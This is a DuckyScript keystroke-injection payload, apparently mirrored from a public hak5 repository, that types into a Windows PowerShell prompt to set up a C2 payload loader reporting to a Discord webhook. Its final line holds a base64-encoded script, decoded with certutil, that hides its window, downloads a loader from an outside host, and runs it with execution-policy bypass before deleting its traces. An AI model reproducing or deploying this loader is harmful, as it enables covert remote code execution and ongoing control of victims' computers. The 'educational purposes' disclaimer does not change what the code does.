mirror of https://github.com/hak5/omg-payloads.git
36 lines
5.5 KiB
Plaintext
36 lines
5.5 KiB
Plaintext
REM Title: BOOTSTRAP - C2 Payload Loader (pLoader) w Discord Reporting
|
|
REM Description: Bootstrap Payload for Remote (C2) Payload Loader with Discord Reporting.
|
|
REM This allows the payload to be executed on OMG Basic and other Smaller Devices. All
|
|
REM inputs below are needed to start the script, unless know how to edit the Source. OMG
|
|
REM and InfoSecREDD (REDD) are not responsible for the misuse of this Payload. This is
|
|
REM for Educational Purposes only.
|
|
REM IT IS ADVISED TO EDIT THE MAIN URL TO POINT TO A CUSTOM VERSION W YOUR VARIABLES
|
|
REM AUTHOR: InfoSecREDD
|
|
REM Version: 0.2
|
|
REM Category: Execution (REMOTE)
|
|
REM Compatibility: Flipper Zero AND DuckyScript Devices
|
|
REM Target: Windows
|
|
|
|
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
|
|
DUCKY_LANG US
|
|
DELAY 2000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell
|
|
ENTER
|
|
DELAY 2000
|
|
REM Put your Discord webhook below.
|
|
STRING $webhook = "DiscordWebhookHere";
|
|
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
|
|
STRING $ccontrol = "C2FileHere";
|
|
REM Put your Remote List of Payloads below.
|
|
STRING $URLS = "URLFileListHere";
|
|
REM Put your Timer file below. 10-18000 Its counted in Minutes.
|
|
STRING $timer = "TimerFileHere";
|
|
REM OVERDRIVE - Overdrive allows the payloads to execute without prior payload finishing. 1 = ON and 0 = OFF
|
|
STRING $overdrive = "OverdriveFileHere";
|
|
REM Lets run this thing.
|
|
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo JFVSTCA9ICJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vaGFrNS9vbWctcGF5bG9hZHMvbWFzdGVyL3BheWxvYWRzL2xpYnJhcnkvZXhlY3V0aW9uL0MyLVBheWxvYWQtTG9hZGVyL0MyLXBMb2FkZXIudHh0Ig0KJGkgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coaW50IGhhbmRsZSwgaW50IHN0YXRlKTsnOw0KYWRkLXR5cGUgLW5hbWUgd2luIC1tZW1iZXIgJGkgLW5hbWVzcGFjZSBuYXRpdmU7DQpbbmF0aXZlLndpbl06OlNob3dXaW5kb3coKFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OkdldEN1cnJlbnRQcm9jZXNzKCkgfCBHZXQtUHJvY2VzcykuTWFpbldpbmRvd0hhbmRsZSwgMCk7DQokUkFOID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgOCB8ICUge1tjaGFyXSRffSkNCiRSQU5mID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMSB8ICUge1tjaGFyXSRffSkNCiRkaXJfbmFtZSA9ICIkUkFOIg0KJHBhdGggPSAiJGVudjp0ZW1wXCRkaXJfbmFtZSINCiR0ZW1wRmlsZW5hbWUgPSAidC50eHQiDQokdGVtcEZpbGUgPSAiJHBhdGhcJHRlbXBGaWxlbmFtZSINCmlmICghKFRlc3QtUGF0aCAiJHBhdGgiKSkNCnsNCiAgTmV3LUl0ZW0gIiRwYXRoIiAtSXRlbVR5cGUgRGlyZWN0b3J5ICA+JG51bGwgMj4mMQ0KfQ0KaWYgKCEoVGVzdC1QYXRoICIkdGVtcEZpbGUiKSkNCnsNCiAgTmV3LUl0ZW0gLVBhdGggIiRwYXRoIiAtTmFtZSAiJHRlbXBGaWxlbmFtZSIgLUl0ZW1UeXBlIEZpbGUgID4kbnVsbCAyPiYxDQp9DQokZW5jRG93biA9ICgoSW52b2tlLXdlYnJlcXVlc3QgLVVSSSAiJFVSTCIgLVVzZUJhc2ljUGFyc2luZykuQ29udGVudCB8IE91dC1TdHJpbmcpLlRyaW0oKSB8IEZvckVhY2gtT2JqZWN0IHsgW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRfKSkgfQ0KJGV4ZURvd24gPSAiJGVuY0Rvd24iIHwgRm9yRWFjaC1PYmplY3QgeyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJF8pKSB9IA0KIiRleGVEb3duIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiJHRlbXBGaWxlIiAtQXBwZW5kDQokYmFzZTY0U3RyID0gJ2VjaG8gW0EtWmEtejAtOS8rXC1fXXsxMjUsfScNCiRkb3duQ29udCA9IEdldC1Db250ZW50IC1QYXRoICIke3RlbXBGaWxlfSIgLVJhdw0KJG1hdGNoID0gW3JlZ2V4XTo6TWF0Y2goIiRkb3duQ29udCIsICIkYmFzZTY0U3RyIikNCmlmICgkbWF0Y2guU3VjY2Vzcykgew0KICAkUkFOID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgOCB8ICUge1tjaGFyXSRffSkNCiAgJFJBTmYgPSAtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCAxIHwgJSB7W2NoYXJdJF99KQ0KICAkZGlyX25hbWUgPSAiJFJBTiINCiAgJHBhdGggPSAiJGVudjp0ZW1wXCRkaXJfbmFtZSINCiAgJHRlbXBGaWxlbmFtZSA9ICJ0LnBzMSINCiAgJHRlbXBGaWxlID0gIiRwYXRoXCR0ZW1wRmlsZW5hbWUiDQogICRiYXNlNjRTdHJDb250ZW50ID0gJ1tBLVphLXowLTkrLz1dezEyNSx9Jw0KICAkbWF0Y2hDb250ZW50ID0gW3JlZ2V4XTo6TWF0Y2goIiRkb3duQ29udCIsICIkYmFzZTY0U3RyQ29udGVudCIpDQogIGlmICgkbWF0Y2hDb250ZW50LlN1Y2Nlc3MpIHsNCiAgICAkZXh0cmFjdGVkU3RyaW5nID0gJG1hdGNoQ29udGVudC5WYWx1ZQ0KICAgIGlmICghKFRlc3QtUGF0aCAiJHBhdGgiKSkNCiAgICB7DQogICAgICBOZXctSXRlbSAiJHBhdGgiIC1JdGVtVHlwZSBEaXJlY3RvcnkgID4kbnVsbCAyPiYxDQogICAgfQ0KICAgIGlmIChUZXN0LVBhdGggIiR0ZW1wRmlsZSIpDQogICAgew0KICAgICAgUmVtb3ZlLUl0ZW0gLVBhdGggIiR0ZW1wRmlsZSIgLUZvcmNlIC1SZWN1cnNlDQogICAgICBOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkdGVtcEZpbGVuYW1lIiAtSXRlbVR5cGUgRmlsZSAgPiRudWxsIDI+JjENCiAgICB9DQogICAgaWYgKCEoVGVzdC1QYXRoICIkdGVtcEZpbGUiKSkNCiAgICB7DQogICAgICBOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkdGVtcEZpbGVuYW1lIiAtSXRlbVR5cGUgRmlsZSAgPiRudWxsIDI+JjENCiAgICB9DQogICAgJGZvcm1hdHBMb2FkZXIgPSAtam9pbiAkZXh0cmFjdGVkU3RyaW5nDQogICAgJHBMb2FkZXJSYXcgPSAiJGZvcm1hdHBMb2FkZXIiIHwgRm9yRWFjaC1PYmplY3QgeyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJF8pKSB9IA0KICAgICRmaXhwTG9hZGVyID0gJHBMb2FkZXJSYXcuU3Vic3RyaW5nKDEpDQogICAgImAkd2ViaG9vayA9IGAiJHdlYmhvb2tgImA7IGAkY2NvbnRyb2wgPSBgIiRjY29udHJvbGAiYDsgYCRVUkxTID0gYCIkVVJMU2AiYDsgYCR0aW1lciA9IGAiJHRpbWVyYCI7IGAkb3ZlcmRyaXZlID0gYCIkb3ZlcmRyaXZlYCJgOyIgfCBPdXQtRmlsZSAtRmlsZVBhdGggIiRwYXRoXCR0ZW1wRmlsZW5hbWUiIC1BcHBlbmQNCiAgICAiJGZpeHBMb2FkZXIiIHwgT3V0LUZpbGUgLUZpbGVQYXRoICIkcGF0aFwkdGVtcEZpbGVuYW1lIiAtQXBwZW5kDQogIH0NCg0KU3RhcnQtUHJvY2VzcyBwb3dlcnNoZWxsIC1Bcmd1bWVudExpc3QgIi1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgYCImICckdGVtcEZpbGUnYCIiIC1QYXNzVGhydSAtV2luZG93U3R5bGUgTWluaW1pemVkID4kbnVsbCAyPiYxDQpzbGVlcCA1DQp9DQppZiAoVGVzdC1QYXRoICIkcGF0aCIpIHsNClJlbW92ZS1JdGVtIC1QYXRoICIkdGVtcEZpbGUiIC1Gb3JjZSAtUmVjdXJzZQ0KUmVtb3ZlLUl0ZW0gLVBhdGggIiRwYXRoIiAtRm9yY2UgLVJlY3Vyc2UNCn0NCmV4aXQgMA== > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
|
|
DELAY 1000
|
|
ENTER
|